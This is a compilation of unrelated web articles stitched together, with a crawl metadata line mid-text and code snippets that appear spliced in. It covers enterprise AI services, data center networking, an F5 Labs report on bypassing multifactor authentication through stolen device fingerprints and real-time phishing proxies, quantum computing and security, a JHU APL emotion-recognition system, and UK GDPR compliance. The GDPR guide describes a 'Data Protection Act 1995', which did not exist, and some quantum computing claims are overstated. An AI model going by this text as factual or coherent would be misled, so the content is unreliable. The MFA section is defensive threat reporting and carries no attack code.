This means there needs to be an understanding of where AI can and should take over and where human decision-making is still vital. For Facebook, this means humans setting the standard for what content they consider objectionable, then letting AI enforce and monitor those rules.
Within the company this research is carried out by Facebook Artificial Intelligence Research. But crucially there is a separate group, the Applied Machine Learning group, devoted to getting this research into products and persuading engineers to think about AI at the earliest stages of design.
Artificial intelligence is on the brink of becoming just another aspect of application development.
There are several cloud-based AI systems for all aspects of enterprise technology, from stock control and pricing tools to systems that can gauge social reaction to events and marketing campaigns.
HPE’s cloud offering ‘HavenOnDemand’ offers over 60 applications and sets of APIs for developers to link enterprise systems to intelligent analysis.
Services range from advanced text analysis and file format conversion to systems to make predictions based on past data and recommendations for action.
The service provides a simple browser-based interface that allows developers to link two or more of these API sets together, easily connecting applications to AI services.
There are also templates of common business use cases for data processing or analysis.
This means businesses can bolt together the different stages required for a task. Take, for instance, unbiased machine-based analysis of web surveys such as Net Promoter questionnaires.
The first stage would carry out any re-formatting which was required.
The second step would analyse text to judge sentiment, then index any unstructured text and finally create an actionable answer to each question posed.
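The three survey-analysis stages described above can be chained as a simple pipeline. The functions below are local stand-ins for the cloud API calls, not actual HavenOnDemand endpoints; they are only meant to illustrate the bolt-together pattern.

```python
# Hypothetical sketch of chaining AI services for survey analysis.
# The functions stand in for remote API calls; the wordlist-based
# sentiment scorer is deliberately crude and purely illustrative.

def reformat_responses(raw_responses):
    # Stage 1: normalize free-text survey answers (stand-in for a
    # format-conversion API call).
    return [r.strip().lower() for r in raw_responses]

def analyze_sentiment(text):
    # Stage 2: crude sentiment stand-in for a text-analysis API call.
    positive = {"good", "great", "recommend", "excellent"}
    negative = {"bad", "poor", "slow", "terrible"}
    words = set(text.split())
    score = len(words & positive) - len(words & negative)
    return "positive" if score > 0 else "negative" if score < 0 else "neutral"

def run_pipeline(raw_responses):
    # Stage 3: index each response with its sentiment as an actionable result.
    cleaned = reformat_responses(raw_responses)
    return [{"text": t, "sentiment": analyze_sentiment(t)} for t in cleaned]

results = run_pipeline(["  GREAT service, would recommend ", "Slow and poor support"])
print(results[0]["sentiment"], results[1]["sentiment"])  # positive negative
```

A real deployment would swap each local function for an HTTP call to the corresponding cloud API, keeping the same staged structure.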
These cloud-based AI systems can access data from almost any source within the enterprise. It is hard to think of any sort of enterprise application which won’t be using some form of machine-based intelligence within five years.
But AI is also leaving the data centre. As its demand for computing resources falls, it is becoming possible to run some AI apps directly on mobile phones and other devices. As implementation becomes ever simpler, AI will play more of a role in embedded systems and IoT devices.
As the amount of data we create continues to double each year the role of machine learning and AI will continue to grow.
It is far from perfect, but it is getting better all the time, and it doesn’t suffer from data overload.
Unlike us humans, the more data it gets, the smarter it becomes.
Modern data center networking aims to connect clients with workloads distributed across data centers. In such a network, servers are the components that provide the necessary services to users (and the programs that run on their behalf).
Responses to API function calls may be the most basic form of such networking services. Servers can provide applications to users and clients via Web protocols, language platforms, or virtual machines that deliver full desktops.
What is a Data Center?
A data center is a facility that centralizes the IT services and resources of an enterprise, as well as where the data is processed, handled and distributed. Data centers store the most critical systems of a network and are essential to streamline day-to-day operations. Therefore, a top priority for organizations is the safety and reliability of data centers and their information.
Although data center designs differ, they can generally be categorized as internet-facing or enterprise-oriented (“internal”). Internet-facing data centers generally support relatively few applications, are mostly browser-based, and often serve unknown numbers of users. Enterprise data centers, on the other hand, serve fewer users but host more applications, ranging from off-the-shelf to custom software.
What is data center networking?
Few business workloads, and increasingly few product and entertainment workloads, are executed on single computers today, which is what makes data center networking necessary. Networks provide a common map for servers, users, applications and middleware to position workload execution and to control access to the data they generate. Data center networking organizes this workflow between resources: the coordinated work between servers and clients in a network.
Data is shared between servers and users, even though modern data centers have no central supervisor of such exchanges. A traditional data center network includes servers that handle workloads and respond to client requests; switches that link devices together; routers that execute packet-forwarding functions; controllers that handle workflows between network devices; and gateways, which serve as junctions between data center networks and the wider Internet.
Software-Defined Data Center Networking
In a software-defined network (SDN), data center workflows can shift dynamically to accommodate varying workloads more effectively. Essentially, the workflow is divided into two categories: the content of documents and media used by clients (the data plane) and the guidance on how this information should be handled by the network (the control plane). This allows an SDN controller to make sweeping changes to how the data plane is mapped, even while a process is underway.
Processes are executed without compromising the control plane and the connections that link the network components together. Nevertheless, enterprises and public services tend to view their data centers as the collection of on-premises servers they own or rent. But even this concept is being eroded by new realities, the most prominent of which is the proliferation of cloud-based services and applications offered by “as-a-service” companies on a subscription or pay-as-you-go basis.
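The control-plane/data-plane split described above can be reduced to a toy model: a controller rewrites the flow table that switches consult for each packet, remapping traffic while forwarding continues. The classes and rule format below are purely illustrative, not a real SDN controller API.

```python
# Minimal illustration of SDN's control/data plane separation.
# The controller (control plane) updates the flow table that a switch
# (data plane) consults per packet, remapping traffic mid-stream
# without touching the forwarding logic itself.

class Switch:
    def __init__(self):
        self.flow_table = {}  # destination prefix -> output port (data-plane state)

    def forward(self, dest):
        # Data plane: look up the rule installed by the controller.
        return self.flow_table.get(dest, "drop")

class Controller:
    def __init__(self, switches):
        self.switches = switches

    def install_rule(self, dest, port):
        # Control plane: push a new mapping to every switch it manages.
        for sw in self.switches:
            sw.flow_table[dest] = port

sw = Switch()
ctrl = Controller([sw])
ctrl.install_rule("10.0.1.0/24", "port2")
print(sw.forward("10.0.1.0/24"))  # port2
ctrl.install_rule("10.0.1.0/24", "port5")  # remap while traffic flows
print(sw.forward("10.0.1.0/24"))  # port5
```

The point of the separation is visible in the last two lines: the controller changes the mapping without the switch's forwarding code changing at all.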
Data Center Networking Trends
- Network Agility
The networks of today need to be incredibly flexible to meet customers' connectivity needs. Being able to access data and services when they are needed is crucial to the success of any organization. This applies in particular to businesses that rely on multiple suppliers and platforms to provide their customers with services. Without measures in place to ensure network availability, institutions leave themselves open to the severe effects of system downtime.
- 5G Infrastructure
Fifth-generation (5G) technology is finally beginning to roll out in select markets after years of promises, and it has become one of the highest-profile trends in data center networking. Telecom carriers are already investing heavily in infrastructure and technologies that will take full advantage of 5G, and any data center that delays preparing for this trend may find it difficult to compete. As the reach of 5G networks grows, consumers will expect this technology to provide the lightning-fast service they have been promised.
- Edge Computing and IoT
The growing proliferation of Internet of Things (IoT) devices has caused many companies to reconsider their network architecture. Since data transmission is bound by the laws of physics, it takes time for data to travel back and forth to the center of the network, adding latency and degrading device performance.
Edge computing architecture pushes core processing functions nearer to the outer edges of the network, where most data is collected and where many users access digital services, enabling devices to respond much more quickly to the data they observe. Whether they use neighboring edge data centers to streamline analysis or process information with their internal hardware, IoT devices on edge computing networks can significantly improve performance.
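The physics-imposed latency mentioned above is easy to quantify: signals in fiber travel at roughly two-thirds the speed of light, so round trips to a distant central data center add milliseconds that a nearby edge site avoids. The distances below are illustrative, not measurements.

```python
# Rough round-trip propagation delay for light in optical fiber,
# which travels at about two-thirds the speed of light in vacuum
# (~200,000 km/s). Processing and queuing delays are ignored.
FIBER_SPEED_KM_PER_S = 200_000

def round_trip_ms(distance_km):
    # Out-and-back distance divided by propagation speed, in milliseconds.
    return 2 * distance_km / FIBER_SPEED_KM_PER_S * 1000

# Illustrative distances: a nearby edge data center vs. a distant central one.
print(f"edge (50 km):      {round_trip_ms(50):.1f} ms")    # 0.5 ms
print(f"central (3000 km): {round_trip_ms(3000):.1f} ms")  # 30.0 ms
```

Even before queuing and processing delays, the central round trip is sixty times longer, which is the gap edge architectures exploit.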
The bottom line
The data center networking market is taking firm root. Cloud computing is expected to drive demand for these technologies through expanded use across industries over the forecast period. The data center industry is in the middle of a massive transformation: thanks to the accessibility and availability of cloud computing infrastructure and SaaS services, any company can deploy applications and technology with just a few clicks.
It is anticipated that growing IoT applications will further boost market growth over the coming years. The notion of a "center" becomes almost entirely elusive as data center networking is increasingly disaggregated. Instead of a place where assets are managed and operated, a data center network may now be no more substantive than a collection of information technology resources, owned, leased, or subscribed to by a business and accessible through one another. The Global Data Center Networking Market is projected to grow at a CAGR of 12.3% over the coming years.
Attackers are always on the lookout for ways to compromise digital identities. A successful account takeover allows a cybercriminal to impersonate a genuine user for monetization purposes. Enterprises large and small have used various means to secure digital identities, and credentials are the starting point. F5 Labs' 2021 Credential Stuffing Report indicates that 1.8 billion credential sets were spilled in 2020 alone. Such a huge stash of credentials is a massive threat to digital identities. An effective mitigation strategy, recommended by various regulatory bodies and security practitioners, is to enforce multifactor authentication (MFA).
MFA, which restricts attackers from capitalizing on compromised credentials, has been on the rise. It requires the user to provide two or more different types of factors: typically something the user knows (such as a password) and something the user has. The second factor is usually a code sent via text message, a hardware token, or a dedicated multifactor authentication app. After entering a username and password, the user must enter the code to complete the login. However, not all authentication systems are created equal, and unsuspecting users can be tricked into providing the second factor. Social engineering is a prevalent way of getting a user to divulge the second factor, but fraudsters have also employed technologically sophisticated ways to bypass MFA. This article evaluates two tricks attackers use to game authentication systems.
Trick 1: Capitalizing on Trusted Sessions
No doubt, the user experience suffers because of MFA. To make this less inconvenient for customers, many websites employ techniques to identify a user device and register that information after the user provides a second authentication factor and consents to trust the device. Once registered, transactions from those devices are deemed safe. For example, an e-commerce website establishes trust with a user device by enforcing MFA on the first logon. It then allows transactions from this trusted user device, which may include use of credit card details stored in the user's profile. This improves the experience for the user, who is not forced to provide a second factor for every transaction. However, any deviation from the user's stored risk profile, such as a known user logging in from a new device, initiates multifactor verification.
Typically, once a device is identified, the information is stored in the form of a cookie on the client side, which will be used to identify the device on the server side. A known device is supposedly less risky and does not trigger additional authentication. Fraudsters understand this process, and we have seen a thriving marketplace named Genesis Store that helps enable these bad actors. For example, a fraudster can obtain device fingerprints and associated cookies and credentials with ease, as shown in Figure 1.
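The trust decision that these stolen fingerprints are designed to defeat can be sketched as a server-side check like the following. The hashing scheme and fingerprint format are simplified illustrations, not any vendor's actual implementation; the point is that a valid cookie plus a spoofed fingerprint is all that stands between an attacker and an MFA skip.

```python
import hashlib
import secrets

# Simplified server-side device-trust check behind risk-based MFA.
# A real system would use signed tokens and far richer fingerprints;
# this sketch shows why a stolen cookie and spoofed fingerprint
# (as sold on Genesis) can satisfy the "known device" test.

trusted_devices = {}  # user -> set of registered device hashes

def device_hash(cookie, fingerprint):
    # Combine the device cookie and browser fingerprint into one identifier.
    return hashlib.sha256((cookie + fingerprint).encode()).hexdigest()

def register_device(user, cookie, fingerprint):
    # Called only after the user completes MFA and consents to trust.
    trusted_devices.setdefault(user, set()).add(device_hash(cookie, fingerprint))

def requires_mfa(user, cookie, fingerprint):
    # Known device -> deemed safe, so no second factor is requested.
    return device_hash(cookie, fingerprint) not in trusted_devices.get(user, set())

cookie = secrets.token_hex(16)
register_device("alice", cookie, "Win10|Chrome|1920x1080")
print(requires_mfa("alice", cookie, "Win10|Chrome|1920x1080"))          # False: trusted
print(requires_mfa("alice", secrets.token_hex(16), "Win10|Chrome|1920x1080"))  # True: new device
```

An attacker who exfiltrates both the cookie and the fingerprint reproduces the exact hash the server expects, which is why defenses must look beyond the fingerprint itself.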
An analysis of data collected from January through May 2021 from a leading financial institution showed fraudsters making targeted attacks using Genesis. About 1,500 requests were aimed at either logons or change password requests using a Genesis plugin that spoofed the attacker’s device as the customer’s device. These requests, which produced around 900 unique browser fingerprints, were crafted to trick the financial institution’s antifraud solution and to potentially prevent triggering multifactor authentication that the attacker might not have access to.
Trick 2: Using Real-Time Phishing Proxies
In the 2020 Phishing and Fraud Report, F5 Labs researchers noted a rise in the use of real-time phishing proxies (RTPP). Simply put, RTPP is a different take on phishing. Instead of setting up fake websites, fraudsters use a person-in-the-middle technique that intercepts users' transactions on the genuine website. Traditional phishing attacks are asynchronous in nature, as the fraudster's objective is to collect credentials and use them at a different time. MFA-enabled accounts are a dampener to these phishing attempts, as they usually rely on time-sensitive tokens that cannot be reused. RTPPs transform phishing from asynchronous to real-time, enabling attackers to capture MFA codes or authenticated session cookies. Armed with these, fraudsters can impersonate a genuine user and complete transactions.
F5 Labs, along with Shape Security researchers, analyzed one such campaign targeting a financial institution. In this attack campaign, cybercriminals set up a spoofed domain and lured customers to access it using various phishing techniques. During the four-week period in which F5 studied the active attack campaign, researchers spotted an interesting anomaly in the devices used. The threat actor group limited itself to real devices, and more than 55,000 attempts were made against 4,127 accounts from a single device. The attackers used a few other devices, but the account-to-device ratio was disproportionate. Table 1 shows the account-related details of five unique devices used in this campaign.
| Device | Unique Account IDs | Number of Login Attempts |
|--------|--------------------|--------------------------|
| 1      | 4,127              | 55,312                   |
| 2      | 307                | 1,409                    |
| 3      | 225                | 875                      |
| 4      | 233                | 399                      |
| 5      | 217                | 811                      |
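A disproportionate account-to-device ratio like the one in Table 1 is straightforward to flag programmatically. The threshold below is an arbitrary illustrative cutoff, not a value from the study.

```python
# Flag devices whose count of unique accounts is anomalously high.
# Figures are taken from the campaign table above; the threshold of
# 50 unique accounts per device is an arbitrary illustrative cutoff.

observed = {  # device -> (unique account IDs, login attempts)
    "device-1": (4127, 55312),
    "device-2": (307, 1409),
    "device-3": (225, 875),
    "device-4": (233, 399),
    "device-5": (217, 811),
}

ACCOUNTS_PER_DEVICE_THRESHOLD = 50

def flag_suspicious(devices, threshold=ACCOUNTS_PER_DEVICE_THRESHOLD):
    # A legitimate household device serves a handful of accounts;
    # hundreds or thousands of accounts from one device is a red flag.
    return [d for d, (accounts, _) in devices.items() if accounts > threshold]

print(flag_suspicious(observed))  # every device in this campaign is flagged
```

This is the kind of affinity analysis recommended in the mitigation list below: track how many accounts each device touches (and vice versa) and alert on outliers.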
Multifactor authentication enhances security for online accounts and makes them more difficult to compromise. But it diminishes the user experience, so businesses often design easier paths based on risk assessment. Fraudsters and attackers look for these easy paths and employ a range of techniques to bypass MFA controls. This makes it essential to understand the threat landscape and implement MFA accordingly.
- Tie MFA to specific transactions and adopt a risk-based approach.
- Analyze the affinity of account-to-device and device-to-account to spot anomalies.
- Deploy controls to check if an endpoint is trying to spoof its fingerprint.
- Detect automated transactions.
- Train users to treat credentials and MFA codes as confidential.
Do you remember when a computer filled an entire room? Not only were they behemoths, they were also slow by today’s standards. Over time, however, the computer became increasingly compact even as its capabilities and speed increased. Today, a device that fits in the palm of a hand can perform sophisticated tasks in the blink of a virtual eye.
Computers are getting smaller and more powerful all the time, as predicted by Moore’s law. That 1965 theory, now an established truism, says computers should double in power every 18 months as transistors shrink, enabling more of them to fit on a processing chip.
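Stated as arithmetic, a doubling every 18 months is simple exponential growth: a count after $t$ years is the starting count times $2^{t/1.5}$. The sketch below just evaluates that formula with illustrative numbers.

```python
# Moore's law as stated above: transistor counts double every 18 months,
# i.e. count(t) = count0 * 2 ** (t / 1.5), with t in years.

def transistors_after(count0, years, doubling_period_years=1.5):
    return count0 * 2 ** (years / doubling_period_years)

# After 15 years, ten doubling periods have elapsed: a 1,024x increase.
print(transistors_after(1_000, 15))  # 1024000.0
```

Ten doublings in fifteen years is why the room-sized machines of a few decades ago fit in a pocket today.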
Now, though, transistors can be the size of a single atom. Has computer technology hit its limit?
We simply can’t get any smaller, not without going down to the subatomic realm. Doing so brings a new set of challenges: In the tiny universe, the laws of physics differ dramatically from what we experience on the human scale. Atomic particles such as electrons and protons, for instance, can exist in two places at the same time. How do we design reliable, predictable information systems in such an unpredictable environment?
Science leads the way
But technology’s progress marches inexorably on, and scientists today are developing tomorrow’s alternatives to our current, silicon-based computing. Physicists, biologists and others are researching not only computing using subatomic particles — “quantum” computing — but also the use of magnetic waves, DNA and other materials to transmit the 0s and 1s that make up digital information.
Although any of these technologies is a long way from our laptops and phones — the only quantum computer in use fills an entire room — some promise processing speeds and complexities exponentially greater than our computers produce today. Quantum computing, for example, is said to process information more than 100 million times faster than the contemporary PC.
Computing is in its infancy, it seems safe to say — and so, by extension, is cybersecurity. The advent of any of these new systems could obliterate current information-security technologies, even providing data that protects itself. Hacking a silicon-based computer network involves cracking the codes written in binary digits, or “bits,” to access the information stored as all those 1s and 0s. But what if there were no code to crack?
Our ‘rules’ don’t apply
Quantum computing works with information stored not in bits but in “qubits,” using the smallest forms of matter such as electrons or photons. According to the laws of quantum physics, these “qubits” don’t necessarily have an assigned value. They can act as 1s, 0s, something in between — or all of the above, at once. If these slippery laws of subatomic nature challenge physicists, how would hackers work around them?
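The "something in between" that a qubit can hold is usually written as a superposition. In standard notation (an addition for clarity, not from the original article):

```latex
% A qubit state as a superposition of the basis states |0> and |1>:
\[
  \lvert \psi \rangle = \alpha \lvert 0 \rangle + \beta \lvert 1 \rangle,
  \qquad \alpha, \beta \in \mathbb{C}, \quad
  \lvert \alpha \rvert^2 + \lvert \beta \rvert^2 = 1
\]
% Measurement yields 0 with probability |alpha|^2 and 1 with probability
% |beta|^2: the "assigned value" only appears when the qubit is measured.
```

This is what makes a classical code-cracking approach ill-defined: until measurement, there is no single bit value to intercept.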
For example, scientists recently developed a technique for "detangling" photons, which occur in pairs, and isolating them from each other. Although separated, they retain their bonded quality: what affects one, affects the other. Heralded as a major breakthrough, this new technique for generating single photons could lead to quantum computing in which tightly bonded photon pairs transmit and receive information, a process likened to communicating via tin-can "telephones." Because any interception would interrupt the bond, like cutting the string between the cans, both senders and recipients would know instantly when a breach occurred.
DNA computing, which uses strands of DNA to process information, and magnetic-wave computing, which uses "solitons" (invisible, naturally occurring solitary waves) to transmit data, also hold promise for faster, more efficient computing that is more secure as well.
On the human timeline, the Information Age warrants barely a blip: the World Wide Web was introduced in 1991. Information security, too, is new, with large-scale thefts of personal and business data occurring only in recent years. Where it's headed next seems fairly clear: away from device-centered approaches and toward ones focused on securing data, no matter where it comes from or where it is going.
Seizing the day for cyber
Until now, cybersecurity has consisted mainly of putting “locks” on existing devices to protect a known universe of things, including, now, the Internet of Things. But with computing technology poised on the brink of momentous change, we in the profession have a unique opportunity to start again, and get security right this time.
We can’t know what tomorrow holds, device-wise, but we do know there will be data — and that’s what we’ve always needed to protect. Keeping that aim in mind may help us transform cybersecurity, from an afterthought “tacked on” to protect a known universe of things, into an essential feature designed for the great, technological unknown.
Whether the next big technology turns out to be quantum, DNA or magnetic-wave computing, or something else, the time is now for the cybersecurity profession to join the conversation. We could be on the ground floor of something big. We would do well to educate ourselves, and to work with scientists, the government and the private sector to ensure that the next generation of computing technology is at least as secure as it is fast and effective.
JR Reagan is the global chief information security officer of Deloitte. He also serves as professional faculty at Johns Hopkins, Cornell and Columbia universities. Follow him @IdeaXplorer.
JHU APL develops mixed reality emotion recognition tech
Researchers at the Johns Hopkins Applied Physics Laboratory (APL) announced on October 25 that they have developed a mixed reality system that improves the ability to detect social signals and emotional displays in real time by amplifying subtle movements of the face and eyes.
The Mixed Reality Social Prosthesis system emphasizes expressions of emotion by overlaying actual psychophysiological data on the face, enabling finer perception of nonverbal cues that are displayed in the course of social interaction.
APL researchers developed the Mixed Reality Social Prosthesis system to sense facial actions, pupil size, blink rate, and gaze direction, and to overlay those signals on the face using the HoloLens, Microsoft’s mixed-reality technology platform. “The result is dramatic accentuation of subtle changes in the face, including changes that people are not usually aware of, like pupil dilation or nostril flare,” said Ariel Greenberg, APL research scientist. The novel system collects facial signals using a range of sensors, synchronizes those signals in real time, registers them in real space, and then overlays those signals on the face of an interaction partner.
The Mixed Reality Social Prosthesis was initially developed by APL researchers for intelligence interviewers and police officers, who could use the system for detecting deception, and to improve skills in de-escalation and conflict resolution. “It can be difficult in the heat of the moment for people to make accurate assessments of others’ emotional state,” said Greenberg. “The Mixed Reality Social Prosthesis could help train officers to recognize and overcome the impact of stress on perception of emotion.”
There are opportunities to apply the system to areas beyond intelligence and law enforcement. As a health care application, the system could help restore function of patients experiencing social deficits as a result of a traumatic brain injury or cognitive decline, or individuals along the autism spectrum.
The Mixed Reality Social Prosthesis could be adapted for clinicians or caretakers who interact with these specialized populations, to assist in interpreting social signals and emotional displays on an individualized basis. “Individuals with social deficits may express emotions in unfamiliar ways,” added Greenberg. “This system could help attune practitioners to patients’ particular patterns of expression.”
Source: JHU APL
What is the UK GDPR?
The UK General Data Protection Regulation (UK GDPR) is the comprehensive framework governing data protection in the United Kingdom. Enacted in the aftermath of Brexit, it carries over the principles of its European Union predecessor. The UK GDPR is tailored to accommodate domestic data operations as well as those involving EU residents. This regulatory milestone not only underscores the UK’s commitment to upholding robust data protection standards but also reflects a dynamic response to the evolving challenges of the post-Brexit era.
The History of Data Protection in the UK
Genesis: Data Protection Act 1984
The roots of data protection laws in the UK can be traced back to the Data Protection Act of 1984. Enacted at a time when personal computers were making their way into households and interconnected networks were in their infancy, this legislation responded to the increasing use of computer systems in processing personal data. The Act addressed concerns about the potential misuse of personal information, especially as technology advanced. It established a framework to regulate the processing of personal data, marking the initial steps toward safeguarding individuals’ privacy rights in the digital age.
Data Protection Act 1995
The Data Protection Act of 1995 represented a significant evolution in response to the growing complexities of data processing. As technology advanced, the need for a more comprehensive and harmonized approach to data protection became apparent. In alignment with the European Data Protection Directive of 1995, the Act sought to standardize data protection practices across EU member states, including the UK. This legislation laid the groundwork for the subsequent Data Protection Act of 1998.
Data Protection Act 1998
The Data Protection Act of 1998 was enacted as a direct response to the increasing challenges posed by the rapid advancement of technology. By 1998, the internet had become a transformative force, and digital data processing had proliferated. The 1995 Act was deemed insufficient to address the complex issues arising from this digital revolution. The Data Protection Act of 1998 not only brought the UK in line with the EU Data Protection Directive but also introduced more robust provisions to regulate the processing of personal data better and protect individuals’ privacy rights. However, as technology continued to outpace the legislation, it became evident that a more comprehensive update was necessary, leading to the subsequent introduction of the GDPR in 2018.
Evolutionary Shift: GDPR
The pivotal moment in this evolution occurred with the advent of the General Data Protection Regulation (GDPR) in the European Union in 2018. As an EU member, the UK automatically embraced the principles of GDPR with the UK DPA 2018, heralding a commitment to harmonized data protection standards across member states.
Post-Brexit Regulatory Independence:
The dynamics changed with the UK’s decision to exit the EU, commonly known as Brexit. As the UK charted its course independent of the EU, a crucial question emerged regarding the future of data protection laws within the country. It became evident that a distinct legal framework was imperative to address the evolving challenges of the digital age while respecting individual privacy rights independent of the EU GDPR. Importantly, the provisions of the EU GDPR are incorporated directly into UK data privacy law as the UK GDPR.
Post-Brexit Landscape: UK GDPR and EU GDPR
With the conclusion of the Brexit transition period on December 31, 2020, the UK GDPR replaced the EU GDPR in the UK. However, organizations in the UK providing goods and services to, or monitoring the behavior of, EU residents continue to fall under the EU GDPR’s jurisdiction. This dual compliance requirement necessitates adherence to both sets of regulations, though their similarities make a unified approach relatively straightforward, with additional measures for international data transfers.
Dual Legal Framework: GDPR and UK GDPR:
The introduction of the UK GDPR created a dual legal framework for data protection in the UK, comprising two integral components: the UK GDPR and the Data Protection Act 2018.
Data Protection Reform in the UK
Post-Brexit, the UK government has been actively reforming data protection laws, with the latest development being the Data Protection and Digital Information (No.2) Bill, also known as the DPDI Bill. The bill aims to create a business-friendly and clear framework, maintaining data adequacy with the EU, reducing bureaucratic requirements, and fostering international trade while upholding comprehensive data protection standards.
Objectives of the UK GDPR
Adaptation to Digital Challenges:
The exponential growth of digital technologies presented new challenges to data protection. The GDPR sought to provide a comprehensive and adaptable framework to address these challenges, ensuring that individuals’ personal data remained secure in an increasingly interconnected world.
Safeguarding Individual Privacy Rights:
At its core, the GDPR was designed to safeguard the privacy rights of individuals. Recognizing the value and sensitivity of personal data, the legislation aimed to instill a culture of responsibility among businesses, ensuring that the processing and handling of personal information adhered to ethical and legal standards.
Governance and Compliance
The governance structure established by the GDPR and the UK GDPR reflects a commitment to ensuring the lawful and ethical processing of personal data. Regulatory bodies, such as the Information Commissioner’s Office (ICO), oversee compliance, investigate breaches, and enforce data protection laws. This dual-layered approach allows the UK to balance upholding high data protection standards and tailoring regulations to its unique circumstances.
Impact on Businesses and Individuals
For businesses operating in the UK, the dual legal framework requires careful navigation. While the principles echo those of the GDPR, there are nuanced differences that businesses must understand to ensure compliance. The GDPR, in conjunction with the UK GDPR, establishes guidelines for firms to handle personal data responsibly, fostering an environment where individuals’ privacy rights are respected and protected.
What Does UK GDPR Mean for Businesses?
The UK General Data Protection Regulation enactment signifies a paradigm shift for businesses, necessitating a comprehensive and proactive approach to data protection. The implications extend beyond mere legal compliance, fostering a culture of responsibility and commitment to safeguarding individuals’ privacy rights in an interconnected world.
Proactive Stance Towards Data Protection
Businesses operating within the UK must adopt a proactive stance towards data protection under the UK GDPR. This means going beyond a reactive, compliance-driven mindset and actively integrating robust data protection measures into their operations. This proactive approach acknowledges the dynamic nature of the digital landscape and the evolving threats to personal data security.
Commitment to Privacy Rights
Compliance with the GDPR is not just a legal obligation; it symbolizes a commitment to protecting the privacy rights of individuals. In an era where personal data is a valuable commodity, and cyber threats loom large, businesses are responsible for ensuring that individuals’ personal information is handled with the utmost care and respect.
Series of Obligations on Businesses
The GDPR places a series of obligations on businesses, outlining specific guidelines for processing, storing, and safeguarding personal data. These obligations are designed to create a framework prioritizing transparency, fairness, and security in handling personal information. The obligations encompass various aspects, from data collection to processing and storage, emphasizing a holistic approach to data protection.
For businesses, operationalizing these principles involves integrating them into every facet of their data management practices. From the initial collection of data to its processing, storage, and eventual disposal, each step must align with the ethical and legal standards set by the GDPR.
Data Protection by Design
The GDPR encourages a “data protection by design” approach, urging businesses to embed privacy considerations into developing products, services, and internal processes. This proactive integration ensures that data protection is not an afterthought but a fundamental aspect of business operations.
By adhering to the principles of the GDPR, businesses can effectively mitigate the risks associated with data breaches, unauthorized access, and non-compliance. Proactive measures, such as conducting data protection impact assessments (DPIAs), enable businesses to identify and address potential risks before they escalate.
Enhanced Trust and Reputation
Compliance with the GDPR goes beyond legal obligations; it enhances trust and reputation. Demonstrating a commitment to protecting individuals’ privacy rights fosters a positive relationship with customers, partners, and stakeholders. In an age where trust is a valuable currency, businesses prioritizing data protection are better positioned in the competitive landscape.
Legal Consequences of Non-Compliance
Non-compliance with the GDPR can have severe legal consequences, including fines and reputational damage. Businesses failing to adhere to the principles risk regulatory scrutiny and legal action, underlining the importance of a proactive and robust approach to data protection.
The 7 Principles of the UK GDPR
The GDPR articulates seven fundamental principles that serve as the cornerstone for businesses when processing personal data. These principles are rooted in the GDPR and establish a comprehensive and ethical framework, guiding businesses on the responsible handling of personal information.
- Lawfulness, Fairness, and Transparency
This principle emphasizes organizations’ need to process personal data lawfully, ensuring transparency in their operations. It requires businesses to be open about their data processing practices, promoting fairness and preventing unwarranted harm to individuals.
- Purpose Limitation
Mandating that organizations collect and process personal data for explicit and legitimate purposes, this principle safeguards individuals by ensuring they are informed about the intended use of their information.
- Data Minimization
The principle of Data Minimization underscores the necessity for organizations to limit data collection to what is strictly required for the specified purposes.
- Accuracy
Requiring organizations to take reasonable steps to ensure the accuracy of processed personal data, this principle highlights the importance of maintaining precise and up-to-date information.
- Storage Limitation
Dictating that personal data should only be retained for as long as necessary, the Storage Limitation principle prevents unnecessary data retention.
- Integrity and Confidentiality (Security)
This principle demands that organizations implement robust security measures to protect personal data from unauthorized access, disclosure, alteration, and destruction.
- Accountability
Necessitating that organizations demonstrate compliance with data protection principles, the Accountability principle emphasizes the importance of maintaining comprehensive records, conducting regular assessments, and actively engaging with data protection processes.
UK DPA vs. GDPR
While the UK GDPR and the EU GDPR share common principles, distinctions arise from the UK’s departure from the EU. Businesses operating in the UK must navigate the dual compliance requirements of the EU GDPR and the UK GDPR. Understanding these subtle differences is crucial for organizations seeking a comprehensive and robust approach to data protection.
How to Comply with the UK GDPR
Achieving compliance with the GDPR demands a strategic and holistic approach. Businesses should start with a comprehensive data audit, identifying the types of personal data they process and the purposes for which it is used. Robust data protection policies and procedures and employee training are essential to ensure awareness and understanding of compliance obligations.
Data protection impact assessments (DPIAs) are pivotal in compliance efforts, helping organizations identify and mitigate potential risks associated with data processing activities. Additionally, businesses meeting specific criteria must appoint a Data Protection Officer (DPO) to oversee compliance efforts.
Regular reviews and updates of data protection policies are imperative to adapt to evolving legal requirements and technological advancements. Engaging with regulatory authorities and staying informed about developments in data protection legislation is also essential for businesses striving to maintain compliance.
The evolution of the GDPR and the UK GDPR reflects a proactive approach to the challenges of the digital age. As technology advances and the digital landscape evolves, these regulations provide a foundation for adapting to new realities while maintaining a steadfast commitment to data protection. The dual legal framework positions the UK as a jurisdiction that respects international standards and tailors its approach to citizens’ needs and priorities.
Looking Ahead: Data Protection and Digital Information (No. 2) Bill
The introduction of the Data Protection and Digital Information (No. 2) Bill to the UK Parliament on 8 March 2023 marked the latest milestone in the UK’s data protection journey. This forward-looking initiative by the UK government aims to “update and simplify” the nation’s data protection laws and related legislation. With its second reading scheduled for 17 April, the bill is expected to continue its passage through Parliament.
Change, while inevitable, can pose challenges to compliance. For organizations that have aligned their privacy programs with the UK GDPR, it’s crucial to stay attuned to the unfolding developments. The Centraleyes Risk and Compliance Platform offers a proactive and informed approach to risk management and compliance.
Stay connected, stay informed, and let Centraleyes be your strategic partner in the dynamic realm of data protection. | <urn:uuid:6042c844-4fc2-496f-ae40-38ae70263b8f> | CC-MAIN-2024-38 | https://www.centraleyes.com/privacy-laws/uk/ | 2024-09-12T03:39:53Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651420.25/warc/CC-MAIN-20240912011254-20240912041254-00428.warc.gz | en | 0.904089 | 2,592 | 3.140625 | 3 |
Privacy by design is an approach to systems engineering initially developed and formalized in 1995 by a joint team led by the Information and Privacy Commissioner of Ontario (Canada). After a quarter of a century and an ever-growing swamp of personal data leakages — caused by poor systems design, poor operational practices, and faulty data management habits — what is the purpose of still discussing this concept?
What does Article 25 of GDPR state about privacy by design & default?
The European Union General Data Protection Regulation (GDPR) brings a new perspective: Article 25 is conveniently named “Data protection by design and by default”. Before tackling the deviation from the original concept in wording, here is the breakdown from the Article 25 text:
- What does “Data protection by design and by default” include? Technical and organisational measures, designed to implement data-protection principles, such as pseudonymisation and data minimisation.
- What does it ensure? Meeting the requirements of the GDPR and protecting the rights of data subjects.
